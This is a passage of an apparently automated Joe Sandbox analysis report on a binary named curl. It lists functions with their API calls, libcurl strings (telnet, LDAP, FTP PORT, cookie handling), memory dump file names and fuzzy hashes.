insufficient winsock version to support telnet, xrefs: 00430824
XDISPLOC, xrefs: 004305DD

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: curl_slist_appendstrncpy$FreeLibraryStartupcurl_msnprintfcurl_slist_free_allsscanf
String ID: !$%127[^= ]%*[ =]%255s$%hu%*[xX]%hu$($BINARY$FreeLibrary(wsock2) failed (%d)$In SUBOPTION processing, RCVD$NEW_ENV$RCVD$Syntax error in telnet option: %s$TTYPE$Time-out$USER,%s$Unknown telnet option %s$WS2_32.DLL$WSACloseEvent$WSACloseEvent failed (%d)$WSACreateEvent$WSACreateEvent failed (%d)$WSAEnumNetworkEvents$WSAEnumNetworkEvents failed (%d)$WSAEventSelect$WSAStartup failed (%d)$XDISPLOC$d$failed to find WSACloseEvent function (%d)$failed to find WSACreateEvent function (%d)$failed to find WSAEnumNetworkEvents function (%d)$failed to find WSAEventSelect function (%d)$failed to load WS2_32.DLL (%d)$insufficient winsock version to support telnet
API String ID: 1588789521-2676206347
Opcode ID: 51af944f01ae809c4d607518a38d431f21a2c227e8c13d9727b17258d77486a2
Instruction ID: 4a2eec365b3df893fbb8424009dda51c0cee74e08a7e5c1c0d5afa90bab3ae86
Opcode Fuzzy Hash: 51af944f01ae809c4d607518a38d431f21a2c227e8c13d9727b17258d77486a2
Instruction Fuzzy Hash: F0B24F70904355CFDB20DF28C8987AABBF1FF48304F1486AAD8899B351D7799985CF4A

Function 00431E20 Relevance: 112.7, APIs: 43, Strings: 21, Instructions: 686stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00416640: curl_mvsnprintf.CURL ref: 00416682
Part of subcall function 00416640: strlen.MSVCRT ref: 0041668A

ldap_err2string.WLDAP32 ref: 00431EFA
ldap_msgfree.WLDAP32 ref: 00431F3B
ldap_unbind_s.WLDAP32 ref: 00431F64
strchr.MSVCRT ref: 00432062
strchr.MSVCRT ref: 00432082
strchr.MSVCRT ref: 004320B4
strchr.MSVCRT ref: 004320E5
curl_easy_unescape.CURL ref: 0043211B
curl_easy_unescape.CURL ref: 0043218E
curl_easy_unescape.CURL ref: 004321E7
ldap_set_option.WLDAP32 ref: 0043224B
ldap_set_option.WLDAP32 ref: 0043226D
ldap_simple_bind_s.WLDAP32 ref: 0043229E
ldap_err2string.WLDAP32 ref: 004322C0
ldap_set_option.WLDAP32 ref: 00432324
ldap_init.WLDAP32 ref: 00432339

Strings

LDAP, xrefs: 00432002
LDAP local: trying to establish %s connection, xrefs: 00432222, 004322FB
subtree, xrefs: 004329D6
LDAP local: %s, xrefs: 00431F00
There are more than %d entries, xrefs: 00431FD7
encrypted, xrefs: 0043221A
onetree, xrefs: 00432991
Microsoft Corporation., xrefs: 00431E6F
LDAP local: ldap_simple_bind_s %s, xrefs: 004322C6
LDAP remote: %s, xrefs: 004323BA
LDAP local: %s, xrefs: 00431E8D
DN: , xrefs: 00432498
Z, xrefs: 00432976
one, xrefs: 00432948
LDAP local: LDAP Vendor = %s ; LDAP Version = %d, xrefs: 00431E77
sub, xrefs: 004329BB
LDAP local: Cannot connect to %s:%ld, xrefs: 00432836
;binary, xrefs: 00432671
,, xrefs: 004328B7
base, xrefs: 004329A7
cleartext, xrefs: 004322F3

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: strchr$curl_easy_unescapeldap_set_option$ldap_err2string$curl_mvsnprintfldap_initldap_msgfreeldap_simple_bind_sldap_unbind_sstrlen
String ID: ,$;binary$DN: $LDAP$LDAP local: %s$LDAP local: %s$LDAP local: Cannot connect to %s:%ld$LDAP local: LDAP Vendor = %s ; LDAP Version = %d$LDAP local: ldap_simple_bind_s %s$LDAP local: trying to establish %s connection$LDAP remote: %s$Microsoft Corporation.$There are more than %d entries$Z$base$cleartext$encrypted$one$onetree$sub$subtree
API String ID: 1863185731-3326706771
Opcode ID: a7c7861f80786a9539e15e8dcf59ce1b2d175152833ea83d0f66d1fa0ca224d8
Instruction ID: cee20d3c28a379dd1c7a8017b275cb25ac9eb42c64125de422cf8f03a509d366
Opcode Fuzzy Hash: a7c7861f80786a9539e15e8dcf59ce1b2d175152833ea83d0f66d1fa0ca224d8
Instruction Fuzzy Hash: 1662C1B05093019FD710DF29C58875ABBE0BF88754F15882EE9D88B361E7B9D885CF46

Function 0042B430 Relevance: 70.6, APIs: 25, Strings: 15, Instructions: 559stringnetworkCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 0042B4C2
strchr.MSVCRT ref: 0042B518
strncpy.MSVCRT ref: 0042B55B
strchr.MSVCRT ref: 0042B56B
strtoul.MSVCRT ref: 0042B590
strchr.MSVCRT ref: 0042B5B1
strtoul.MSVCRT ref: 0042B5D4
getsockname.WS2_32 ref: 0042B831

Part of subcall function 00417870: strlen.MSVCRT ref: 004178A9

memcpy.MSVCRT ref: 0042B713
htons.WS2_32 ref: 0042B739
bind.WS2_32 ref: 0042B766
WSAGetLastError.WS2_32 ref: 0042B777
strcpy.MSVCRT ref: 0042B7DF
strchr.MSVCRT ref: 0042BA10

Strings

failed to resolve the address provided to PORT: %s, xrefs: 0042B9DC
PORT, xrefs: 0042BCBE
], xrefs: 0042BA08
socket failure: %s, xrefs: 0042B9B4, 0042BB40
%s %s, xrefs: 0042BCC6
EPRT, xrefs: 0042BD71
bind(port=%hu) on non-local address failed: %s, xrefs: 0042B8D8
bind(port=%hu) failed: %s, xrefs: 0042BA93
Failure sending EPRT command: %s, xrefs: 0042BDAA
%s |%d|%s|%hu|, xrefs: 0042BD88
A', xrefs: 0042B8C4
Failure sending PORT command: %s, xrefs: 0042BDFF
bind() failed, we ran out of ports!, xrefs: 0042B7A3
getsockname() failed: %s, xrefs: 0042B958, 0042BB69
,%d,%d, xrefs: 0042BC9F

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: strchr$strlenstrtoul$ErrorLastbindgetsocknamehtonsmemcpystrcpystrncpy
String ID: %s %s$%s |%d|%s|%hu|$,%d,%d$A'$EPRT$Failure sending EPRT command: %s$Failure sending PORT command: %s$PORT$]$bind() failed, we ran out of ports!$bind(port=%hu) failed: %s$bind(port=%hu) on non-local address failed: %s$failed to resolve the address provided to PORT: %s$getsockname() failed: %s$socket failure: %s
API String ID: 3640025607-3168131385
Opcode ID: 035c9233ec0d01154dddf72e9984b5b876be01b9177e73813811c9f09dee14e8
Instruction ID: a9a9543897c215b873a08e576acf680d8632e8290393974ec9d1e43d9429dbab
Opcode Fuzzy Hash: 035c9233ec0d01154dddf72e9984b5b876be01b9177e73813811c9f09dee14e8
Instruction Fuzzy Hash: 76420DB4E057259FEB209F25D54479ABBF0FF84304F4188AEE88897352D7789984CF86

Function 00421A00 Relevance: 49.9, APIs: 12, Strings: 16, Instructions: 907stringCOMMON

Download Yara Rule

APIs

time.MSVCRT ref: 00421A1C
strchr.MSVCRT ref: 00421A8B
strchr.MSVCRT ref: 00421AAA

Part of subcall function 0044D260: _errno.MSVCRT ref: 0044D289

strchr.MSVCRT ref: 00421E90
sscanf.MSVCRT ref: 00421EEC
strlen.MSVCRT ref: 00421EFC

Strings

#HttpOnly_, xrefs: 00421A5F
Replaced, xrefs: 00421DF4
expires, xrefs: 004226B6
%s cookie %s="%s" for domain %s, path %s, expire %I64d, xrefs: 00421E26
version, xrefs: 004223FA
FALSE, xrefs: 00421B83
httponly, xrefs: 00422261
max-age, xrefs: 004224CC
/, xrefs: 00422757
domain, xrefs: 004221D4
%1023[^; =]=%4999[^;], xrefs: 00421ED8
path, xrefs: 00421FE3
TRUE, xrefs: 00421AFF, 00421B73, 00421BD5
secure, xrefs: 00422198
Added, xrefs: 00421DEB
skipped cookie with bad tailmatch domain: %s, xrefs: 00422573

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: strchr$_errnosscanfstrlentime
String ID: #HttpOnly_$%1023[^; =]=%4999[^;]$%s cookie %s="%s" for domain %s, path %s, expire %I64d$/$Added$FALSE$Replaced$TRUE$domain$expires$httponly$max-age$path$secure$skipped cookie with bad tailmatch domain: %s$version
API String ID: 992714130-1569463933
Opcode ID: d2472a7a7ba9ff874c3b41e2b7df97c240a2ab18dfdacfd8d341d4d41be35cd7
Instruction ID: 1bd29dc8aab30057cacd55c5b71c3fca438647568d643a272b37c0d5c07c4ca0
Opcode Fuzzy Hash: d2472a7a7ba9ff874c3b41e2b7df97c240a2ab18dfdacfd8d341d4d41be35cd7
Instruction Fuzzy Hash: 15825A707083109FD760DF25D68472BBBE1BF98754F89892EE8898B351E778D841CB4A

Function 0040D870 Relevance: 28.2, APIs: 7, Strings: 9, Instructions: 160stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 0040D8B8
curl_msnprintf.CURL ref: 0040D8E3
curl_easy_setopt.CURL ref: 0040D8FA
curl_easy_setopt.CURL ref: 0040D955
free.MSVCRT ref: 0040D9BC

Strings

dF, xrefs: 0040D89C
(curl_off_t)%I64d, xrefs: 0040DA1B
%ldL, xrefs: 0040D8CF
functionpointer, xrefs: 0040D936
objectpointer, xrefs: 0040D9FC
%s set to a %s, xrefs: 0040DA9F
CURLOPT_SSL_VERIFYPEER, xrefs: 0040D897
curl_easy_setopt(hnd, %s, "%s");, xrefs: 0040D9A1
curl_easy_setopt(hnd, %s, %s);, xrefs: 0040DA78

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: curl_easy_setopt$curl_msnprintffreestrcmp
String ID: dF$%ldL$%s set to a %s$(curl_off_t)%I64d$CURLOPT_SSL_VERIFYPEER$curl_easy_setopt(hnd, %s, "%s");$curl_easy_setopt(hnd, %s, %s);$functionpointer$objectpointer
API String ID: 2033831321-3831073191
Opcode ID: 4d314a83beb61cedde32b8fa1342f6e1ce050907de062dce0b5e75608905c529
Instruction ID: 1b0d8baa8b3eee75832ae3d9dfe3f624b446dc2274dbd8e7a225c8a0a677430a
Opcode Fuzzy Hash: 4d314a83beb61cedde32b8fa1342f6e1ce050907de062dce0b5e75608905c529
Instruction Fuzzy Hash: 91512DB19083059BC720EF66D48429FFBE5AFC4354F15C83FE4899B351DB7898498B8A

Function 00432889 Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 153stringCOMMON

Download Yara Rule

APIs

ldap_err2string.WLDAP32 ref: 00431EFA
ldap_msgfree.WLDAP32 ref: 00431F3B
ldap_unbind_s.WLDAP32 ref: 00431F64
strchr.MSVCRT ref: 004320B4
strchr.MSVCRT ref: 004320E5
curl_easy_unescape.CURL ref: 0043211B
curl_easy_unescape.CURL ref: 0043218E
curl_easy_unescape.CURL ref: 004321E7
ldap_set_option.WLDAP32 ref: 0043224B
ldap_set_option.WLDAP32 ref: 0043226D
ldap_simple_bind_s.WLDAP32 ref: 0043229E
ldap_err2string.WLDAP32 ref: 004322C0
strchr.MSVCRT ref: 004328A8
strchr.MSVCRT ref: 004328C2

Strings

LDAP local: %s, xrefs: 00431F00
,, xrefs: 004328B7
Z, xrefs: 004321AF

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: strchr$curl_easy_unescape$ldap_err2stringldap_set_option$ldap_msgfreeldap_simple_bind_sldap_unbind_s
String ID: ,$LDAP local: %s$Z
API String ID: 3827195569-4017054001
Opcode ID: 0e97737e5a47c3f328e4ed7e75e0760e2486f99f5388249c20eaf78fcc8c47b3
Instruction ID: fbb05936f832b06c27bab2f3faf97d26dd83f4f198bfd04e07174c4cbfeadcd8
Opcode Fuzzy Hash: 0e97737e5a47c3f328e4ed7e75e0760e2486f99f5388249c20eaf78fcc8c47b3
Instruction Fuzzy Hash: 1F610AB05083019FD7109F29C58431BBBE0BF89794F15891EE9D88B3A1E7B9D845CF5A

Function 0044DAB0 Relevance: 20.8, APIs: 7, Strings: 4, Instructions: 1569stringCOMMON

Download Yara Rule

APIs

localeconv.MSVCRT ref: 0044DABA
strlen.MSVCRT ref: 0044DAC4

Strings

!, xrefs: 0044F57C
, xrefs: 0044EE24
inity, xrefs: 0044F187
5, xrefs: 0044DFCE

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: localeconvstrlen
String ID: $!$5$inity
API String ID: 186660782-1328200385
Opcode ID: 834edb88839c3aab039f4ddce4459fc05319cf13f5d185e1e888fd996237239f
Instruction ID: 595c69d9557bf061797d1f72a6fd0f83d5db91cb0d802856a29af3caeb72a379
Opcode Fuzzy Hash: 834edb88839c3aab039f4ddce4459fc05319cf13f5d185e1e888fd996237239f
Instruction Fuzzy Hash: 07E21571A087818FE720DF29C48475BBBE1BF88304F15892EE98987351D779E949CB4B

Function 00418FB0 Relevance: 17.5, APIs: 3, Strings: 6, Instructions: 1746COMMON

Download Yara Rule

Strings

deflate, gzip, xrefs: 00419DD8
Set-Cookie:, xrefs: 0041AC81
SESS, xrefs: 0041AB18
CURLOPT_SSL_VERIFYHOST no longer supports 1 as value!, xrefs: 0041AB81
ALL, xrefs: 00419E25
FLUSH, xrefs: 0041AC3D

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID:
String ID: ALL$CURLOPT_SSL_VERIFYHOST no longer supports 1 as value!$FLUSH$SESS$Set-Cookie:$deflate, gzip
API String ID: 0-471683619
Opcode ID: 4477926efbff808f3e23ede45945d403e612b09b6f1fee269a57b05983d7ca1f
Instruction ID: eb34da8a472f34f309809ce9536f5b708f3149273a24633e28568e5e2efef01e
Opcode Fuzzy Hash: 4477926efbff808f3e23ede45945d403e612b09b6f1fee269a57b05983d7ca1f
Instruction Fuzzy Hash: B5E240716152019FDB64CE28C5D42DA77E2AB48300F29887BDC9A8F389D73D9CC1DB5A

Function 00413807 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 93stringwindowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00413822
strerror.MSVCRT ref: 00413913
strncpy.MSVCRT ref: 00413927
strrchr.MSVCRT ref: 00413941
strrchr.MSVCRT ref: 00413961
GetLastError.KERNEL32 ref: 00413975
SetLastError.KERNEL32 ref: 00413981
strncpy.MSVCRT ref: 00413AF6
FormatMessageA.KERNEL32 ref: 00413B3C
curl_msnprintf.CURL ref: 00413B68

Strings

No data record of requested type, xrefs: 004138A4
Unknown error %d (%#x), xrefs: 00413B55

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: ErrorLast$strncpystrrchr$FormatMessagecurl_msnprintfstrerror
String ID: No data record of requested type$Unknown error %d (%#x)
API String ID: 2530841112-3873300688
Opcode ID: c455066fecabd21ef67d76233f7dd9cfb974f5c58169a20fa2088bff6d42abc9
Instruction ID: 74c34756bc37da8a4230e557e64c717641a44b9fde28a2d623b56f7d6ef31ef4
Opcode Fuzzy Hash: c455066fecabd21ef67d76233f7dd9cfb974f5c58169a20fa2088bff6d42abc9
Instruction Fuzzy Hash: 4931D4709083159FD710AF2DD5883AEBFE0AB40306F05847FE88897351C7BD8AC48B9A

Function 0042B8A9 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 67networkstringCOMMON

Download Yara Rule

APIs

Part of subcall function 00413810: GetLastError.KERNEL32 ref: 00413822
Part of subcall function 00413810: strrchr.MSVCRT ref: 00413941
Part of subcall function 00413810: strrchr.MSVCRT ref: 00413961
Part of subcall function 00413810: GetLastError.KERNEL32 ref: 00413975
Part of subcall function 00413810: SetLastError.KERNEL32 ref: 00413981
Part of subcall function 00413810: FormatMessageA.KERNEL32 ref: 00413B3C
Part of subcall function 00413810: curl_msnprintf.CURL ref: 00413B68

Part of subcall function 00416640: curl_mvsnprintf.CURL ref: 00416682
Part of subcall function 00416640: strlen.MSVCRT ref: 0041668A

htons.WS2_32 ref: 0042B739
bind.WS2_32 ref: 0042B766
WSAGetLastError.WS2_32 ref: 0042B777
strcpy.MSVCRT ref: 0042B7DF
getsockname.WS2_32 ref: 0042B831
getsockname.WS2_32 ref: 0042B919
WSAGetLastError.WS2_32 ref: 0042B940
WSAGetLastError.WS2_32 ref: 0042B991
getsockname.WS2_32 ref: 0042BAF7
listen.WS2_32 ref: 0042BB19
WSAGetLastError.WS2_32 ref: 0042BB28

Strings

bind() failed, we ran out of ports!, xrefs: 0042B7A3
bind(port=%hu) on non-local address failed: %s, xrefs: 0042B8D8
A', xrefs: 0042B8C4

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: ErrorLast$getsockname$strrchr$FormatMessagebindcurl_msnprintfcurl_mvsnprintfhtonslistenstrcpystrlen
String ID: A'$bind() failed, we ran out of ports!$bind(port=%hu) on non-local address failed: %s
API String ID: 2203876257-2375382545
Opcode ID: 201189b24c8182bf6525b7e4e101a9d3876135ea469eb32d35e0457b4e706974
Instruction ID: d201c64c5ee40cce0a16b63416d257258684bedb8633da1a4a441a0fff23b5b3
Opcode Fuzzy Hash: 201189b24c8182bf6525b7e4e101a9d3876135ea469eb32d35e0457b4e706974
Instruction Fuzzy Hash: 10319BB5E053249FEB20AF64D94479EBBF0FF85300F4188AEE88897301D73499848F86

Function 0044C84C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 38COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 0044C89F
UnhandledExceptionFilter.KERNEL32 ref: 0044C8AF
GetCurrentProcess.KERNEL32 ref: 0044C8B8
TerminateProcess.KERNEL32 ref: 0044C8C9
abort.MSVCRT ref: 0044C8D2

Strings

UG, xrefs: 0044C8A8

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentTerminateabort
String ID: UG
API String ID: 520269711-3410356670
Opcode ID: a5bcc26d70885bf8b59da09453ed2abae983886c4d034303cfc1fe998ad06529
Instruction ID: 706690025bc5ab7324ff065f333bf3e4d6246ef15b8d076c109d52f96d1c0f09
Opcode Fuzzy Hash: a5bcc26d70885bf8b59da09453ed2abae983886c4d034303cfc1fe998ad06529
Instruction Fuzzy Hash: 4601C0B4804704DFD740EFB9E9482497BF0FB04746F00892DE94C9B326EBB4A5848F8A

Function 0044C850 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 0044C89F
UnhandledExceptionFilter.KERNEL32 ref: 0044C8AF
GetCurrentProcess.KERNEL32 ref: 0044C8B8
TerminateProcess.KERNEL32 ref: 0044C8C9
abort.MSVCRT ref: 0044C8D2

Strings

UG, xrefs: 0044C8A8

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
